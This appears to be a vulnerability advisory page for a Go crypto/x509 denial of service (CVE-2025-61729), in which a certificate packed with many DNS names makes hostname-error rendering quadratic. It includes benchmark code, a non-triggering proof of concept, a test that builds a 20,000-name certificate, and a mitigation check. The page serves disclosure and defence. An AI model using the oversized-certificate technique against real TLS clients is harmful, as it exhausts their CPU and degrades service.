📄 Go crypto/x509 Hostname Verification Denial of Service

Published: 04 Feb 2026 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news (157 views)

DoS in Go crypto/x509 hostname verification: a certificate carrying a very large number of DNSNames causes CPU exhaustion on the verifying side.

Related (family: IBM Security Bulletins; reporter: ibm)

- 14 Apr 2026 16:58  Security Bulletin: IBM Watson Speech Services Cartridge is vulnerable to Improper Certificate Validation in crypto/x509 [CVE-2025-61729]
- 27 May 2026 15:10  Security Bulletin: Multiple security vulnerabilities addressed with IBM Business Automation Workflow cumulative fixes April 2026
- 8 Apr 2026 10:48   Security Bulletin: Certificate Name Constraints Bypass via Wildcard SANs affects watsonx.data
- 5 Feb 2026 12:50   Security Bulletin: IBM App Connect Enterprise Certified Container operator and operands are vulnerable to loss of confidentiality (CVE-2025-61727) and denial of service (CVE-2025-61729)
- 27 Feb 2026 03:34  Security Bulletin: Multiple vulnerabilities affect Data Virtualization on IBM Software Hub (February 2026)
- 16 Mar 2026 21:53  Security Bulletin: Multiple vulnerabilities in IBM Planning Analytics
- 20 May 2026 15:34  Security Bulletin: IBM Guardium Data Protection is affected by multiple vulnerabilities
- 30 Jan 2026 17:17  Security Bulletin: Multiple security vulnerabilities addressed with IBM Business Automation Workflow containers January 2026
- 16 Jan 2026 09:29  Security Bulletin: Vulnerability in crypto/x509 affects IBM Netezza Appliance
- 20 Apr 2026 09:57  Security Bulletin: ELM on Hybrid Cloud vulnerabilities addressed in 2.0.0
=============================================================================================================================================
    | # Title     : Go crypto/x509 Hostname Verification Denial of Service                                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : The Go project, https://go.dev/                                                                                             |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/214685/ & CVE-2025-61729
    
    [+] Summary    : A denial of service condition is reported in the Go standard library's crypto/x509 package. The issue occurs during TLS hostname
                     verification, when the package builds the human-readable error message for a certificate that carries a very large number of DNS names.
                     In affected versions that message is assembled by repeated string concatenation with no upper bound on the number of names, so the
                     work grows quadratically (O(n²)) in the number of names. An attacker who can present a certificate to a Go TLS client, or to any code
                     that calls VerifyHostname, can pack it with an excessive number of DNSNames and burn CPU and allocation bandwidth on the verifying side.
    				 
    [+] Affected Versions : The advisory states that all Go releases prior to the official fix are affected, and lists the following as NOT vulnerable:
    
    - Go 1.23.1
    - Go 1.22.10
    - Any Go release containing the official patch
    
    Check these numbers before relying on them: Go 1.23.1 (September 2024) and Go 1.22.10 (December 2024) predate the assignment of CVE-2025-61729, and
    the Go 1.22 line left support in early 2025. The authoritative fixed-version data is the Go vulnerability database (https://pkg.go.dev/vuln/), which
    `govulncheck ./...` consults against the toolchain and dependencies actually in use.
    
    [+] Technical Details : When hostname verification fails, the crypto/x509 package constructs a human-readable error string listing all DNS names present in the TLS certificate.
    
    [+] In vulnerable versions:
    
    - No upper bound is enforced on the number of DNS names included in the message
    - The names are joined with repeated "+=" string concatenation, which copies the whole partial string on every append
    - The result is quadratic running time and an O(n²) volume of short-lived allocations for the garbage collector to reclaim
    
    An attacker-controlled certificate with tens or hundreds of thousands of DNS names can therefore trigger resource exhaustion during error generation alone, before any application code sees the error.
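The cost difference is easy to see in isolation. The following is an added example, not code from the advisory or from the Go standard library: it builds a constructed list of hostN.example.com names and renders the same "valid for ..., not host" message two ways, once with per-name += concatenation (the pattern the advisory describes) and once with strings.Join, timing both. The names, the target host and the message wording are constructed for illustration.

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

// makeNames builds a constructed SAN list of the form hostN.example.com.
func makeNames(n int) []string {
	names := make([]string, n)
	for i := range names {
		names[i] = fmt.Sprintf("host%d.example.com", i)
	}
	return names
}

// describeQuadratic mirrors the pattern the advisory describes: one "+="
// per name. Every append copies the whole string built so far, so the total
// work is O(n^2) in the number of names and each step leaves the previous
// string behind as garbage.
func describeQuadratic(names []string, host string) string {
	valid := ""
	for _, name := range names {
		if len(valid) > 0 {
			valid += ", "
		}
		valid += name
	}
	return "x509: certificate is valid for " + valid + ", not " + host
}

// describeLinear produces the identical message with strings.Join, which
// sizes one buffer up front and copies each name exactly once: O(n).
func describeLinear(names []string, host string) string {
	return "x509: certificate is valid for " + strings.Join(names, ", ") + ", not " + host
}

// timeIt returns fn's result and how long one call took.
func timeIt(fn func() string) (string, time.Duration) {
	start := time.Now()
	s := fn()
	return s, time.Since(start)
}

func main() {
	host := "example.com"
	// Each 4x step in n should cost roughly 16x on the quadratic path and
	// roughly 4x on the linear one.
	for _, n := range []int{1000, 4000, 16000} {
		names := makeNames(n)
		q, dq := timeIt(func() string { return describeQuadratic(names, host) })
		l, dl := timeIt(func() string { return describeLinear(names, host) })
		fmt.Printf("n=%6d quadratic=%-14v linear=%-14v same=%v\n", n, dq, dl, q == l)
	}
}
```

Both functions return byte-identical messages, so the only thing the measurement isolates is the concatenation strategy; a cap on the number of names included (as in the PoC's Error() method below) is the other half of a complete fix, since even a linear join of hundreds of thousands of names is wasted work for an error nobody reads in full.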
    
    
    [+] PoC : The following PoC builds a certificate-like structure with 100,000 DNS names and a local stand-in for crypto/x509's HostnameError whose
              Error() method is the bounded, strings.Builder-based form (at most 10 names plus a count of the rest). Error() is intentionally not invoked.
              Because the code never touches crypto/x509 and never runs the quadratic concatenation, it does not reproduce the DoS on any Go version;
              it illustrates the shape of a hardened error message, not the vulnerable path.
    
    File: hostname_error.go
    -----------------------
    package main
    
    import (
        "fmt"
        "strings"
    )
    
    type HostnameError struct {
        Certificate *Certificate
        Host        string
    }
    
    type Certificate struct {
        DNSNames []string
    }
    
    // Error renders at most maxNames names plus a count of the rest, using a
    // single strings.Builder. This is the bounded, linear-time form; it is a
    // local stand-in and not the crypto/x509 implementation.
    func (h HostnameError) Error() string {
        const maxNames = 10
    
        var builder strings.Builder
        names := h.Certificate.DNSNames
    
        builder.WriteString("certificate is valid for ")
    
        displayCount := len(names)
        if displayCount > maxNames {
            displayCount = maxNames
        }
    
        for i := 0; i < displayCount; i++ {
            if i > 0 {
                builder.WriteString(", ")
            }
            builder.WriteString(names[i])
        }
    
        if len(names) > maxNames {
            builder.WriteString(
                fmt.Sprintf(", and %d more", len(names)-maxNames),
            )
        }
    
        builder.WriteString(fmt.Sprintf(", not for %s", h.Host))
        return builder.String()
    }
    -------------
    File: poc.go
    -------------
    package main
    
    import "fmt"
    
    func main() {
        cert := &Certificate{
            DNSNames: make([]string, 100000),
        }
    
        for i := range cert.DNSNames {
            cert.DNSNames[i] = fmt.Sprintf("host%d.example.com", i)
        }
    
        err := HostnameError{
            Certificate: cert,
            Host:        "example.com",
        }
    
        fmt.Println("[+] HostnameError object created")
        fmt.Printf("[+] DNSNames count: %d\n", len(cert.DNSNames))
    
        // Error() is deliberately not called here. Note that this stand-in is
        // bounded and cheap on any Go version; it is not the crypto/x509 type,
        // so calling it would say nothing about whether the toolchain is affected.
        _ = err
    }
    
    [+] How to Run
    
    1. Save the files as:
       - hostname_error.go
       - poc.go
    
    2. Initialise a module in the same directory (go run . refuses to run without a go.mod):
       $ go mod init poc
    
    3. Run the PoC:
       $ go run .
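The PoC above never touches crypto/x509, so it cannot tell you how the toolchain you actually ship behaves. The added example below (not part of the advisory, and not Go project code) does: it self-signs a throwaway certificate with 20,000 DNS SANs, runs the real x509.Certificate.VerifyHostname against a name the certificate does not cover, and times HostnameError.Error(). It also shows the pre-check a client can run before hostname verification: rejecting leaves whose SAN count exceeds a budget. The budget value, the example.org names and the helper names are assumptions made for this example; nothing in Go enforces such a limit.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// maxSANs is an assumed per-leaf budget for this example; Go has no such limit.
const maxSANs = 1000

// makeLeaf self-signs a throwaway certificate carrying n DNS SANs
// (constructed test data; none of them is the host we verify against).
func makeLeaf(n int) (*x509.Certificate, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	names := make([]string, n)
	for i := range names {
		names[i] = fmt.Sprintf("host%d.example.org", i)
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: "bulk-san-test"},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(time.Hour),
		DNSNames:     names,
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// checkSANBudget is the pre-check a client can run on a parsed leaf before
// hostname verification: refuse absurd SAN counts outright instead of
// letting the verifier (and its error rendering) spend time on them.
func checkSANBudget(c *x509.Certificate, max int) error {
	if n := len(c.DNSNames) + len(c.IPAddresses); n > max {
		return fmt.Errorf("leaf carries %d SANs, budget is %d", n, max)
	}
	return nil
}

// hostnameMismatch runs the real crypto/x509 hostname check against host,
// requires it to fail with a HostnameError, and returns the rendered message
// together with the time Error() took to build it.
func hostnameMismatch(c *x509.Certificate, host string) (string, time.Duration, error) {
	err := c.VerifyHostname(host)
	var he x509.HostnameError
	if !errors.As(err, &he) {
		return "", 0, fmt.Errorf("expected HostnameError, got %v", err)
	}
	start := time.Now()
	msg := he.Error()
	return msg, time.Since(start), nil
}

func main() {
	leaf, err := makeLeaf(20000)
	if err != nil {
		panic(err)
	}
	fmt.Printf("[+] leaf has %d DNS SANs, DER size %d bytes\n", len(leaf.DNSNames), len(leaf.Raw))
	if err := checkSANBudget(leaf, maxSANs); err != nil {
		fmt.Println("[+] SAN budget check rejects it:", err)
	}
	msg, d, err := hostnameMismatch(leaf, "example.com")
	if err != nil {
		panic(err)
	}
	fmt.Printf("[+] Error() rendered %d bytes in %v (head: %.60s...)\n", len(msg), d, msg)
}
```

Run it on each toolchain you deploy and compare the Error() time as you scale the SAN count; a linear implementation roughly doubles when the count doubles, a quadratic one roughly quadruples. The budget check belongs wherever your code first has a parsed leaf in hand, since tls.Config.VerifyPeerCertificate runs only after the standard verification (including the hostname check) has already completed.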
    
    Greetings to :============================================================
    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
    ==========================================================================


Scoring (Vulners, as of 04 Feb 2026 00:00)
- Vulners AI Score: 5.5 (Medium risk)
- CVSS 3.1: 7.5
- EPSS: 0.00019
- SSVC: none listed
- Views: 157